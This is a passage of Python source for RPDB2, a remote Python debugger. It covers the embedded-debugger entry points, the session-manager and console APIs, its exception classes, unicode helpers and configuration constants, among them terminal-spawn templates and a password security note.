import xmlrpc.client as xmlrpclib
import socketserver as SocketServer
import subprocess as commands
import copyreg as copy_reg
import http.client as httplib
import _thread as thread
#
# Needed in py3k path.
#
import numbers
#
#-------------------------------- Design Notes -------------------------------
#
"""
Design:
RPDB2 divides the world into two main parts: debugger and debuggee.
The debuggee is the script that needs to be debugged.
The debugger is another script that attaches to the debuggee for the
purpose of debugging.
Thus RPDB2 includes two main components: The debuggee-server that runs
in the debuggee and the session-manager that runs in the debugger.
The session manager and the debuggee-server communicate via XML-RPC.
The main classes are: CSessionManager and CDebuggeeServer
"""
#
#--------------------------------- Export functions ------------------------
#
TIMEOUT_FIVE_MINUTES = 5 * 60.0
def start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted = True,
fAllowRemote = False,
timeout = TIMEOUT_FIVE_MINUTES,
source_provider = None,
fDebug = False,
depth = 0
):
"""
Use 'start_embedded_debugger' to invoke the debugger engine in embedded
scripts. put the following line as the first line in your script:
import rpdb2; rpdb2.start_embedded_debugger(<some-password-string>)
This will cause the script to freeze until a debugger console attaches.
_rpdb2_pwd - The password that governs security of client/server communication.
fAllowUnencrypted - Allow unencrypted communications. Communication will
be authenticated but encrypted only if possible.
fAllowRemote - Allow debugger consoles from remote machines to connect.
timeout - Seconds to wait for attachment before giving up. Once the
timeout period expires, the debuggee will resume execution.
If None, never give up. If 0, do not wait at all.
source_provider - When script source is not available on file system it is
possible to specify a function that receives a "filename" and returns
its source. If filename specifies a file that does not fall under
the jurisdiction of this function it should raise IOError. If this
function is responsible for the specified file but the source is
not available it should raise IOError(SOURCE_NOT_AVAILABLE). You can
study the way source_provider_blender() works. Note that a misbehaving
function can break the debugger.
fDebug - debug output.
depth - Depth of the frame in which the debugger should be started. This
defaults to '0' so the top of stack will be in the code where
start_embedded_debugger is called.
IMPORTNAT SECURITY NOTE:
USING A HARDCODED PASSWORD MAY BE UNSECURE SINCE ANYONE WITH READ
PERMISSION TO THE SCRIPT WILL BE ABLE TO READ THE PASSWORD AND CONNECT TO
THE DEBUGGER AND DO WHATEVER THEY WISH VIA THE 'EXEC' DEBUGGER COMMAND.
It is safer to use: start_embedded_debugger_interactive_password()
"""
return __start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
timeout,
source_provider,
fDebug,
depth + 2
)
def start_embedded_debugger_interactive_password(
fAllowUnencrypted = True,
fAllowRemote = False,
timeout = TIMEOUT_FIVE_MINUTES,
source_provider = None,
fDebug = False,
stdin = sys.stdin,
stdout = sys.stdout,
depth = 0
):
if g_server is not None:
return
while True:
if stdout is not None:
stdout.write('Please type password:')
_rpdb2_pwd = stdin.readline().rstrip('\n')
_rpdb2_pwd = as_unicode(_rpdb2_pwd, detect_encoding(stdin), fstrict = True)
try:
return __start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
timeout,
source_provider,
fDebug,
depth + 2
)
except BadArgument:
stdout.write(STR_PASSWORD_BAD)
def settrace():
"""
Trace threads that were created with thread.start_new_thread()
To trace, call this function from the thread target function.
NOTE: The main thread and any threads created with the threading module
are automatically traced, and there is no need to invoke this function
for them.
Note: This call does not pause the script.
"""
return __settrace()
def setbreak(depth = 0):
"""
Pause the script for inspection at next script statement.
"""
return __setbreak(depth + 2)
def set_temp_breakpoint(path, scopename = '', lineno = 1):
"""
Set a temporary breakpoint in a file. path must be an absolute path.
scopename can either be an empty string or a fully qualified scope name
(For example u'g_debugger.m_bp_manager.set_temp_breakpoint'). lineno is
either relative to file start or to scope start.
To set a temporary breakpoint to hit when a file is first
imported or exec-uted call set_temp_breakpoint(path)
This function may throw a varaiety of exceptions.
"""
path = as_unicode(path, fstrict = True)
scopename = as_unicode(scopename, fstrict = True)
return __set_temp_breakpoint(path, scopename, lineno)
#
#----------------------------------- Interfaces ------------------------------
#
VERSION = (2, 4, 8, 0, 'Tychod')
RPDB_TITLE = "RPDB 2.4.8 - Tychod"
RPDB_VERSION = "RPDB_2_4_8"
RPDB_COMPATIBILITY_VERSION = "RPDB_2_4_0"
def get_version():
return RPDB_VERSION
def get_interface_compatibility_version():
return RPDB_COMPATIBILITY_VERSION
class CSimpleSessionManager:
"""
This is a wrapper class that simplifies launching and controlling of a
debuggee from within another program. For example, an IDE that launches
a script for debugging puposes can use this class to launch, debug and
stop a script.
"""
def __init__(self, fAllowUnencrypted = True):
self.__sm = CSessionManagerInternal(
_rpdb2_pwd = None,
fAllowUnencrypted = fAllowUnencrypted,
fAllowRemote = False,
host = LOCALHOST
)
self.m_fRunning = False
event_type_dict = {CEventUnhandledException: {}}
self.__sm.register_callback(self.__unhandled_exception, event_type_dict, fSingleUse = False)
event_type_dict = {CEventState: {}}
self.__sm.register_callback(self.__state_calback, event_type_dict, fSingleUse = False)
event_type_dict = {CEventExit: {}}
self.__sm.register_callback(self.__termination_callback, event_type_dict, fSingleUse = False)
def shutdown(self):
self.__sm.shutdown()
def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = False):
command_line = as_unicode(command_line, encoding, fstrict = True)
self.m_fRunning = False
self.__sm.launch(fchdir, command_line, fload_breakpoints)
def request_go(self):
self.__sm.request_go()
def detach(self):
self.__sm.detach()
def stop_debuggee(self):
self.__sm.stop_debuggee()
def get_session_manager(self):
return self.__sm
def prepare_attach(self):
"""
Use this method to attach a debugger to the debuggee after an
exception is caught.
"""
_rpdb2_pwd = self.__sm.get_password()
si = self.__sm.get_server_info()
rid = si.m_rid
if os.name == 'posix':
#
# On posix systems the password is set at the debuggee via
# a special temporary file.
#
create_pwd_file(rid, _rpdb2_pwd)
_rpdb2_pwd = None
return (rid, _rpdb2_pwd)
#
# Override these callbacks to react to the related events.
#
def unhandled_exception_callback(self):
_print('unhandled_exception_callback')
self.request_go()
def script_paused(self):
_print('script_paused')
self.request_go()
def script_terminated_callback(self):
_print('script_terminated_callback')
#
# Private Methods
#
def __unhandled_exception(self, event):
self.unhandled_exception_callback()
def __termination_callback(self, event):
self.script_terminated_callback()
def __state_calback(self, event):
"""
Handle state change notifications from the debugge.
"""
if event.m_state != STATE_BROKEN:
return
if not self.m_fRunning:
#
# First break comes immediately after launch.
#
print_debug('Simple session manager continues on first break.')
self.m_fRunning = True
self.request_go()
return
if self.__sm.is_unhandled_exception():
return
sl = self.__sm.get_stack(tid_list = [], fAll = False)
if len(sl) == 0:
self.request_go()
return
st = sl[0]
s = st.get(DICT_KEY_STACK, [])
if len(s) == 0:
self.request_go()
return
e = s[-1]
function_name = e[2]
filename = os.path.basename(e[0])
if filename != DEBUGGER_FILENAME:
#
# This is a user breakpoint (e.g. rpdb2.setbreak())
#
self.script_paused()
return
#
# This is the setbreak() before a fork, exec or program
# termination.
#
self.request_go()
return
class CSessionManager:
"""
Interface to the session manager.
This is the interface through which the debugger controls and
communicates with the debuggee.
Accepted strings are either utf-8 or Unicode unless specified otherwise.
Returned strings are Unicode (also when embedded in data structures).
You can study the way it is used in StartClient()
"""
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
if _rpdb2_pwd != None:
assert(is_valid_pwd(_rpdb2_pwd))
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
self.__smi = CSessionManagerInternal(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
host
)
def shutdown(self):
return self.__smi.shutdown()
def set_printer(self, printer):
"""
'printer' is a function that takes one argument and prints it.
You can study CConsoleInternal.printer() as example for use
and rational.
"""
return self.__smi.set_printer(printer)
def report_exception(self, type, value, tb):
"""
Sends exception information to the printer.
"""
return self.__smi.report_exception(type, value, tb)
def register_callback(self, callback, event_type_dict, fSingleUse):
"""
Receive events from the session manager.
The session manager communicates it state mainly by firing events.
You can study CConsoleInternal.__init__() as example for use.
For details see CEventDispatcher.register_callback()
"""
return self.__smi.register_callback(
callback,
event_type_dict,
fSingleUse
)
def remove_callback(self, callback):
return self.__smi.remove_callback(callback)
def refresh(self):
"""
Fire again all relevant events needed to establish the current state.
"""
return self.__smi.refresh()
def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = True):
"""
Launch debuggee in a new process and attach.
fchdir - Change current directory to that of the debuggee.
command_line - command line arguments pass to the script as a string.
fload_breakpoints - Load breakpoints of last session.
if command line is not a unicode string it will be decoded into unicode
with the given encoding
"""
command_line = as_unicode(command_line, encoding, fstrict = True)
return self.__smi.launch(fchdir, command_line, fload_breakpoints)
def restart(self):
"""
Restart debug session with same command_line and fchdir arguments
which were used in last launch.
"""
return self.__smi.restart()
def get_launch_args(self):
"""
Return command_line and fchdir arguments which were used in last
launch as (last_fchdir, last_command_line).
Returns (None, None) if there is no info.
"""
return self.__smi.get_launch_args()
def attach(self, key, name = None, encoding = 'utf-8'):
"""
Attach to a debuggee (establish communication with the debuggee-server)
key - a string specifying part of the filename or PID of the debuggee.
if key is not a unicode string it will be decoded into unicode
with the given encoding
"""
key = as_unicode(key, encoding, fstrict = True)
return self.__smi.attach(key, name)
def detach(self):
"""
Let the debuggee go...
"""
return self.__smi.detach()
def request_break(self):
return self.__smi.request_break()
def request_go(self):
return self.__smi.request_go()
def request_go_breakpoint(self, filename, scope, lineno):
"""
Go (run) until the specified location is reached.
"""
filename = as_unicode(filename, fstrict = True)
scope = as_unicode(scope, fstrict = True)
return self.__smi.request_go_breakpoint(filename, scope, lineno)
def request_step(self):
"""
Go until the next line of code is reached.
"""
return self.__smi.request_step()
def request_next(self):
"""
Go until the next line of code in the same scope is reached.
"""
return self.__smi.request_next()
def request_return(self):
"""
Go until end of scope is reached.
"""
return self.__smi.request_return()
def request_jump(self, lineno):
"""
Jump to the specified line number in the same scope.
"""
return self.__smi.request_jump(lineno)
#
# REVIEW: should return breakpoint ID
#
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr):
"""
Set a breakpoint.
filename - (Optional) can be either a file name or a module name,
full path, relative path or no path at all.
If filname is None or '', then the current module is
used.
scope - (Optional) Specifies a dot delimited scope for the
breakpoint, such as: foo or myClass.foo
lineno - (Optional) Specify a line within the selected file or
if a scope is specified, an zero-based offset from the
start of the scope.
expr - (Optional) A Python expression that will be evaluated
locally when the breakpoint is hit. The break will
occur only if the expression evaluates to true.
"""
filename = as_unicode(filename, fstrict = True)
scope = as_unicode(scope, fstrict = True)
expr = as_unicode(expr, fstrict = True)
return self.__smi.set_breakpoint(
filename,
scope,
lineno,
fEnabled,
expr
)
def disable_breakpoint(self, id_list, fAll):
"""
Disable breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - disable all breakpoints regardless of id_list.
"""
return self.__smi.disable_breakpoint(id_list, fAll)
def enable_breakpoint(self, id_list, fAll):
"""
Enable breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - disable all breakpoints regardless of id_list.
"""
return self.__smi.enable_breakpoint(id_list, fAll)
def delete_breakpoint(self, id_list, fAll):
"""
Delete breakpoints
id_list - (Optional) A list of breakpoint ids.
fAll - disable all breakpoints regardless of id_list.
"""
return self.__smi.delete_breakpoint(id_list, fAll)
def get_breakpoints(self):
"""
Return breakpoints in a dictionary of id keys to CBreakPoint values
"""
return self.__smi.get_breakpoints()
def save_breakpoints(self, _filename = ''):
"""
Save breakpoints to file, locally (on the client side)
"""
return self.__smi.save_breakpoints(_filename)
def load_breakpoints(self, _filename = ''):
"""
Load breakpoints from file, locally (on the client side)
"""
return self.__smi.load_breakpoints(_filename)
def set_trap_unhandled_exceptions(self, ftrap):
"""
Set trap-unhandled-exceptions mode.
ftrap with a value of False means unhandled exceptions will be ignored.
The session manager default is True.
"""
return self.__smi.set_trap_unhandled_exceptions(ftrap)
def get_trap_unhandled_exceptions(self):
"""
Get trap-unhandled-exceptions mode.
"""
return self.__smi.get_trap_unhandled_exceptions()
def set_fork_mode(self, ffork_into_child, ffork_auto):
"""
Determine how to handle os.fork().
ffork_into_child - True|False - If True, the debugger will debug the
child process after a fork, otherwise the debugger will continue
to debug the parent process.
ffork_auto - True|False - If True, the debugger will not pause before
a fork and will automatically make a decision based on the
value of the ffork_into_child flag.
"""
return self.__smi.set_fork_mode(ffork_into_child, ffork_auto)
def get_fork_mode(self):
"""
Return the fork mode in the form of a (ffork_into_child, ffork_auto)
flags tuple.
"""
return self.__smi.get_fork_mode()
def get_stack(self, tid_list, fAll):
return self.__smi.get_stack(tid_list, fAll)
def get_source_file(self, filename, lineno, nlines):
filename = as_unicode(filename, fstrict = True)
return self.__smi.get_source_file(filename, lineno, nlines)
def get_source_lines(self, nlines, fAll):
return self.__smi.get_source_lines(nlines, fAll)
def set_frame_index(self, frame_index):
"""
Set frame index. 0 is the current executing frame, and 1, 2, 3,
are deeper into the stack.
"""
return self.__smi.set_frame_index(frame_index)
def get_frame_index(self):
"""
Get frame index. 0 is the current executing frame, and 1, 2, 3,
are deeper into the stack.
"""
return self.__smi.get_frame_index()
def set_analyze(self, fAnalyze):
"""
Toggle analyze mode. In analyze mode the stack switches to the
exception stack for examination.
"""
return self.__smi.set_analyze(fAnalyze)
def set_host(self, host):
"""
Set host to specified host (string) for attaching to debuggies on
specified host. host can be a host name or ip address in string form.
"""
return self.__smi.set_host(host)
def get_host(self):
return self.__smi.get_host()
def calc_server_list(self):
"""
Calc servers (debuggable scripts) list on specified host.
Returns a tuple of a list and a dictionary.
The list is a list of CServerInfo objects sorted by their age
ordered oldest last.
The dictionary is a dictionary of errors that were encountered
during the building of the list. The dictionary has error (exception)
type as keys and number of occurances as values.
"""
return self.__smi.calc_server_list()
def get_server_info(self):
"""
Return CServerInfo server info object that corresponds to the
server (debugged script) to which the session manager is
attached.
"""
return self.__smi.get_server_info()
def get_namespace(self, nl, filter_level, repr_limit = 128, fFilter = "DEPRECATED"):
"""
get_namespace is designed for locals/globals panes that let
the user inspect a namespace tree in GUI debuggers such as Winpdb.
You can study the way it is used in Winpdb.
nl - List of tuples, where each tuple is made of a python expression
as string and a flag that controls whether to "expand" the
value, that is, to return its children as well in case it has
children e.g. lists, dictionaries, etc...
filter_level - 0, 1, or 2. Filter out methods and functions from
classes and objects. (0 - None, 1 - Medium, 2 - Maximum).
repr_limit - Length limit (approximated) to be imposed on repr() of
returned items.
examples of expression lists:
[('x', false), ('y', false)]
[('locals()', true)]
[('a.b.c', false), ('my_object.foo', false), ('another_object', true)]
Return value is a list of dictionaries, where every element
in the list corresponds to an element in the input list 'nl'.
Each dictionary has the following keys and values:
DICT_KEY_EXPR - the original expression string.
DICT_KEY_REPR - A repr of the evaluated value of the expression.
DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
valid for the purpose of re-evaluation.
DICT_KEY_TYPE - A string representing the type of the experession's
evaluated value.
DICT_KEY_N_SUBNODES - If the evaluated value has children like items
in a list or in a dictionary or members of a class,
etc, this key will have their number as value.
DICT_KEY_SUBNODES - If the evaluated value has children and the
"expand" flag was set for this expression, then the
value of this key will be a list of dictionaries as
described below.
DICT_KEY_ERROR - If an error prevented evaluation of this expression
the value of this key will be a repr of the
exception info: repr(sys.exc_info())
Each dictionary for child items has the following keys and values:
DICT_KEY_EXPR - The Python expression that designates this child.
e.g. 'my_list[0]' designates the first child of the
list 'my_list'
DICT_KEY_NAME - a repr of the child name, e.g '0' for the first item
in a list.
DICT_KEY_REPR - A repr of the evaluated value of the expression.
DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
valid for the purpose of re-evaluation.
DICT_KEY_TYPE - A string representing the type of the experession's
evaluated value.
DICT_KEY_N_SUBNODES - If the evaluated value has children like items
in a list or in a dictionary or members of a class,
etc, this key will have their number as value.
"""
if fFilter != "DEPRECATED":
filter_level = fFilter
filter_level = int(filter_level)
return self.__smi.get_namespace(nl, filter_level, repr_limit)
#
# REVIEW: remove warning item.
#
def evaluate(self, expr):
"""
Evaluate a python expression in the context of the current thread
and frame.
Return value is a tuple (v, w, e) where v is a repr of the evaluated
expression value, w is always '', and e is an error string if an error
occurred.
NOTE: This call might not return since debugged script logic can lead
to tmporary locking or even deadlocking.
"""
expr = as_unicode(expr, fstrict = True)
return self.__smi.evaluate(expr)
def execute(self, suite):
"""
Execute a python statement in the context of the current thread
and frame.
Return value is a tuple (w, e) where w and e are warning and
error strings (respectively) if an error occurred.
NOTE: This call might not return since debugged script logic can lead
to tmporary locking or even deadlocking.
"""
suite = as_unicode(suite, fstrict = True)
return self.__smi.execute(suite)
def complete_expression(self, expr):
"""
Return matching completions for expression.
Accepted expressions are of the form a.b.c
Dictionary lookups or functions call are not evaluated. For
example: 'getobject().complete' or 'dict[item].complete' are
not processed.
On the other hand partial expressions and statements are
accepted. For example: 'foo(arg1, arg2.member.complete' will
be accepted and the completion for 'arg2.member.complete' will
be calculated.
Completions are returned as a tuple of two items. The first item
is a prefix to expr and the second item is a list of completions.
For example if expr is 'foo(self.comp' the returned tuple can
be ('foo(self.', ['complete', 'completion', etc...])
"""
expr = as_unicode(expr, fstrict = True)
return self.__smi.complete_expression(expr)
def set_encoding(self, encoding, fraw = False):
"""
Set the encoding that will be used as source encoding for execute()
evaluate() commands and in strings returned by get_namespace().
The encoding value can be either 'auto' or any encoding accepted by
the codecs module. If 'auto' is specified, the encoding used will be
the source encoding of the active scope, which is utf-8 by default.
The default encoding value is 'auto'.
If fraw is True, strings returned by evaluate() and get_namespace()
will represent non ASCII characters as an escape sequence.
"""
return self.__smi.set_encoding(encoding, fraw)
def get_encoding(self):
"""
return the (encoding, fraw) tuple.
"""
return self.__smi.get_encoding()
def set_synchronicity(self, fsynchronicity):
"""
Set the synchronicity mode.
Traditional Python debuggers that use the inspected thread (usually
the main thread) to query or modify the script name-space have to
wait until the script hits a break-point. Synchronicity allows the
debugger to query and modify the script name-space even if its
threads are still running or blocked in C library code by using
special worker threads. In some rare cases querying or modifying data
in synchronicity can crash the script. For example in some Linux
builds of wxPython querying the state of wx objects from a thread
other than the GUI thread can crash the script. If this happens or
if you want to restrict these operations to the inspected thread,
turn synchronicity off.
On the other hand when synchronicity is off it is possible to
accidentally deadlock or block indefinitely the script threads by
querying or modifying particular data structures.
The default is on (True).
"""
return self.__smi.set_synchronicity(fsynchronicity)
def get_synchronicity(self):
return self.__smi.get_synchronicity()
def get_state(self):
"""
Get the session manager state. Return one of the STATE_* constants
defined below, for example STATE_DETACHED, STATE_BROKEN, etc...
"""
return self.__smi.get_state()
#
# REVIEW: Improve data strucutre.
#
def get_thread_list(self):
return self.__smi.get_thread_list()
def set_thread(self, tid):
"""
Set the focused thread to the soecified thread.
tid - either the OS thread id or the zero based index of the thread
in the thread list returned by get_thread_list().
"""
return self.__smi.set_thread(tid)
def set_password(self, _rpdb2_pwd):
"""
Set the password that will govern the authentication and encryption
of client-server communication.
"""
_rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)
return self.__smi.set_password(_rpdb2_pwd)
def get_password(self):
"""
Get the password that governs the authentication and encryption
of client-server communication.
"""
return self.__smi.get_password()
def get_encryption(self):
"""
Get the encryption mode. Return True if unencrypted connections are
not allowed. When launching a new debuggee the debuggee will inherit
the encryption mode. The encryption mode can be set via command-line
only.
"""
return self.__smi.get_encryption()
def set_remote(self, fAllowRemote):
"""
Set the remote-connections mode. if True, connections from remote
machine are allowed. When launching a new debuggee the debuggee will
inherit this mode. This mode is only relevant to the debuggee.
"""
return self.__smi.set_remote(fAllowRemote)
def get_remote(self):
"""
Get the remote-connections mode. Return True if connections from
remote machine are allowed. When launching a new debuggee the
debuggee will inherit this mode. This mode is only relevant to the
debuggee.
"""
return self.__smi.get_remote()
def set_environ(self, envmap):
"""
Set the environment variables mapping. This mapping is used
when a new script is launched to modify its environment.
Example for a mapping on Windows: [('Path', '%Path%;c:\\mydir')]
Example for a mapping on Linux: [('PATH', '$PATH:~/mydir')]
The mapping should be a list of tupples where each tupple is
composed of a key and a value. Keys and Values must be either
strings or Unicode strings. Other types will raise the BadArgument
exception.
Invalid arguments will be silently ignored.
"""
return self.__smi.set_environ(envmap)
def get_environ(self):
"""
Return the current environment mapping.
"""
return self.__smi.get_environ()
def stop_debuggee(self):
"""
Stop the debuggee immediately.
"""
return self.__smi.stop_debuggee()
class CConsole:
"""
Interface to a debugger console.
"""
def __init__(
self,
session_manager,
stdin = None,
stdout = None,
fSplit = False
):
"""
Constructor of CConsole
session_manager - session manager object.
stdin, stdout - redirection for IO.
fsplit - Set flag to True when Input and Ouput belong to different
panes. For example take a look at Winpdb.
"""
self.m_ci = CConsoleInternal(
session_manager,
stdin,
stdout,
fSplit
)
def start(self):
return self.m_ci.start()
def join(self):
"""
Wait until the console ends.
"""
return self.m_ci.join()
def set_filename(self, filename):
"""
Set current filename for the console. The current filename can change
from outside the console when the console is embeded in other
components, for example take a look at Winpdb.
"""
filename = as_unicode(filename)
return self.m_ci.set_filename(filename)
def complete(self, text, state):
"""
Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
text = as_unicode(text)
return self.m_ci.complete(text, state)
def printer(self, text):
text = as_unicode(text)
return self.m_ci.printer(text)
#
# ---------------------------- Exceptions ----------------------------------
#
class CException(Exception):
"""
Base exception class for the debugger.
"""
def __init__(self, *args):
Exception.__init__(self, *args)
class BadMBCSPath(CException):
"""
Raised on Windows systems when the python executable or debugger script
path can not be encoded with the file system code page. This means that
the Windows code page is misconfigured.
"""
class NotPythonSource(CException):
"""
Raised when an attempt to load non Python source is made.
"""
class InvalidScopeName(CException):
"""
Invalid scope name.
This exception might be thrown when a request was made to set a breakpoint
to an unknown scope.
"""
class BadArgument(CException):
"""
Bad Argument.
"""
class ThreadNotFound(CException):
"""
Thread not found.
"""
class NoThreads(CException):
"""
No Threads.
"""
class ThreadDone(CException):
"""
Thread Done.
"""
class DebuggerNotBroken(CException):
"""
Debugger is not broken.
This exception is thrown when an operation that can only be performed
while the debuggee is broken, is requested while the debuggee is running.
"""
class InvalidFrame(CException):
"""
Invalid Frame.
This exception is raised if an operation is requested on a stack frame
that does not exist.
"""
class NoExceptionFound(CException):
"""
No Exception Found.
This exception is raised when exception information is requested, but no
exception is found, or has been thrown.
"""
class CConnectionException(CException):
def __init__(self, *args):
CException.__init__(self, *args)
class FirewallBlock(CConnectionException):
"""Firewall is blocking socket communication."""
class BadVersion(CConnectionException):
"""Bad Version."""
def __init__(self, version):
CConnectionException.__init__(self)
self.m_version = version
def __str__(self):
return repr(self.m_version)
class UnexpectedData(CConnectionException):
"""Unexpected data."""
class AlreadyAttached(CConnectionException):
"""Already Attached."""
class NotAttached(CConnectionException):
"""Not Attached."""
class SpawnUnsupported(CConnectionException):
"""Spawn Unsupported."""
class UnknownServer(CConnectionException):
"""Unknown Server."""
class CSecurityException(CConnectionException):
def __init__(self, *args):
CConnectionException.__init__(self, *args)
class UnsetPassword(CSecurityException):
"""Unset Password."""
class EncryptionNotSupported(CSecurityException):
"""Encryption Not Supported."""
class EncryptionExpected(CSecurityException):
"""Encryption Expected."""
class DecryptionFailure(CSecurityException):
"""Decryption Failure."""
class AuthenticationBadData(CSecurityException):
"""Authentication Bad Data."""
class AuthenticationFailure(CSecurityException):
"""Authentication Failure."""
class AuthenticationBadIndex(CSecurityException):
"""Authentication Bad Index."""
def __init__(self, max_index = 0, anchor = 0):
CSecurityException.__init__(self)
self.m_max_index = max_index
self.m_anchor = anchor
def __str__(self):
return repr((self.m_max_index, self.m_anchor))
#
#----------------- unicode handling for compatibility with py3k ----------------
#
def is_py3k():
return sys.version_info[0] >= 3
def is_unicode(s):
if is_py3k() and type(s) == str:
return True
if type(s) == unicode:
return True
return False
def as_unicode(s, encoding = 'utf-8', fstrict = False):
if is_unicode(s):
return s
if fstrict:
u = s.decode(encoding)
else:
u = s.decode(encoding, 'replace')
return u
def as_string(s, encoding = 'utf-8', fstrict = False):
if is_py3k():
if is_unicode(s):
return s
if fstrict:
e = s.decode(encoding)
else:
e = s.decode(encoding, 'replace')
return e
if not is_unicode(s):
return s
if fstrict:
e = s.encode(encoding)
else:
e = s.encode(encoding, 'replace')
return e
def as_bytes(s, encoding = 'utf-8', fstrict = True):
if not is_unicode(s):
return s
if fstrict:
b = s.encode(encoding)
else:
b = s.encode(encoding, 'replace')
return b
#
#----------------------- Infinite List of Globals ---------------------------
#
#
# According to PEP-8: "Use 4 spaces per indentation level."
#
PYTHON_TAB_WIDTH = 4
GNOME_DEFAULT_TERM = 'gnome-terminal'
NT_DEBUG = 'nt_debug'
SCREEN = 'screen'
MAC = 'mac'
DARWIN = 'darwin'
POSIX = 'posix'
#
# Map between OS type and relevant command to initiate a new OS console.
# entries for other OSs can be added here.
# '%s' serves as a place holder.
#
# Currently there is no difference between 'nt' and NT_DEBUG, since now
# both of them leave the terminal open after termination of debuggee to
# accommodate scenarios of scripts with child processes.
#
osSpawn = {
'nt': 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
NT_DEBUG: 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
POSIX: "%(term)s -e %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
'Terminal': "Terminal --disable-server -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
GNOME_DEFAULT_TERM: "gnome-terminal --disable-factory -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
MAC: '%(exec)s %(options)s',
DARWIN: '%(exec)s %(options)s',
SCREEN: 'screen -t debuggee_console %(exec)s %(options)s'
}
RPDBTERM = 'RPDBTERM'
COLORTERM = 'COLORTERM'
TERM = 'TERM'
KDE_PREFIX = 'KDE'
GNOME_PREFIX = 'GNOME'
KDE_DEFAULT_TERM_QUERY = "kreadconfig --file kdeglobals --group General --key TerminalApplication --default konsole"
XTERM = 'xterm'
RXVT = 'rxvt'
RPDB_SETTINGS_FOLDER = '.rpdb2_settings'
RPDB_PWD_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'passwords')
RPDB_BPL_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'breakpoints')
RPDB_BPL_FOLDER_NT = 'rpdb2_breakpoints'
MAX_BPL_FILES = 100
EMBEDDED_SYNC_THRESHOLD = 1.0
EMBEDDED_SYNC_TIMEOUT = 5.0
HEARTBEAT_TIMEOUT = 16
IDLE_MAX_RATE = 2.0
PING_TIMEOUT = 4.0
LOCAL_TIMEOUT = 1.0
COMMUNICATION_RETRIES = 5
WAIT_FOR_BREAK_TIMEOUT = 3.0
SHUTDOWN_TIMEOUT = 4.0
STARTUP_TIMEOUT = 3.0
STARTUP_RETRIES = 3
LOOPBACK = '127.0.0.1'
LOCALHOST = 'localhost'
SERVER_PORT_RANGE_START = 51000
SERVER_PORT_RANGE_LENGTH = 24
SOURCE_EVENT_CALL = 'C'
SOURCE_EVENT_LINE = 'L'
SOURCE_EVENT_RETURN = 'R'
SOURCE_EVENT_EXCEPTION = 'E'
SOURCE_STATE_UNBROKEN = '*'
SOURCE_BP_ENABLED = 'B'
SOURCE_BP_DISABLED = 'D'
SYMBOL_MARKER = '>'
SYMBOL_ALL = '*'
SOURCE_MORE = '+'
SOURCE_LESS = '-'
SOURCE_ENTIRE_FILE = '^'
CONSOLE_PRINTER = '*** '
CONSOLE_WRAP_INDEX = 78
CONSOLE_PROMPT = '\n> '
CONSOLE_PROMPT_ANALYZE = '\nAnalayze> '
CONSOLE_INTRO = ("""RPDB2 - The Remote Python Debugger, version %s,
Copyright (C) 2005-2009 Nir Aides.
Type "help", "copyright", "license", "credits" for more information.""" % (RPDB_VERSION))
PRINT_NOTICE_PROMPT = "Hit Return for more, or q (and Return) to quit:"
PRINT_NOTICE_LINES_PER_SECTION = 20
STR_NO_THREADS = "Operation failed since no traced threads were found."
STR_STARTUP_NOTICE = "Attaching to debuggee..."
STR_SPAWN_UNSUPPORTED = "The debugger does not know how to open a new console on this system. You can start the debuggee manually with the -d flag on a separate console and then use the 'attach' command to attach to it."
STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX = """Alternatively, you can use the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_AUTOMATIC_LAUNCH_UNKNOWN = STR_SPAWN_UNSUPPORTED
STR_STARTUP_SPAWN_NOTICE = "Starting debuggee..."
STR_KILL_NOTICE = "Stopping debuggee..."
STR_STARTUP_FAILURE = "Debuggee failed to start in a timely manner."
STR_OUTPUT_WARNING = "Textual output will be done at the debuggee."
STR_OUTPUT_WARNING_ASYNC = "The operation will continue to run in the background."
STR_ANALYZE_GLOBALS_WARNING = "In analyze mode the globals and locals dictionaries are read only."
STR_BREAKPOINTS_LOADED = "Breakpoints were loaded."
STR_BREAKPOINTS_SAVED = "Breakpoints were saved."
STR_BREAKPOINTS_SAVE_PROBLEM = "A problem occurred while saving the breakpoints."
STR_BREAKPOINTS_LOAD_PROBLEM = "A problem occurred while loading the breakpoints."
STR_BREAKPOINTS_NOT_SAVED = "Breakpoints were not saved."
STR_BREAKPOINTS_NOT_LOADED = "Breakpoints were not loaded."
STR_BREAKPOINTS_FILE_NOT_FOUND = "Breakpoints file was not found."
STR_BREAKPOINTS_NOT_FOUND = "No Breakpoints were found."
STR_BAD_FILENAME = "Bad File Name."
STR_SOME_BREAKPOINTS_NOT_LOADED = "Some breakpoints were not loaded, because of an error."
STR_BAD_EXPRESSION = "Bad expression '%s'."
STR_FILE_NOT_FOUND = "File '%s' not found."
STR_DISPLAY_ERROR = """If the X server (Windowing system) is not started you need to use rpdb2 with the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_EXCEPTION_NOT_FOUND = "No exception was found."
STR_SCOPE_NOT_FOUND = "Scope '%s' not found."
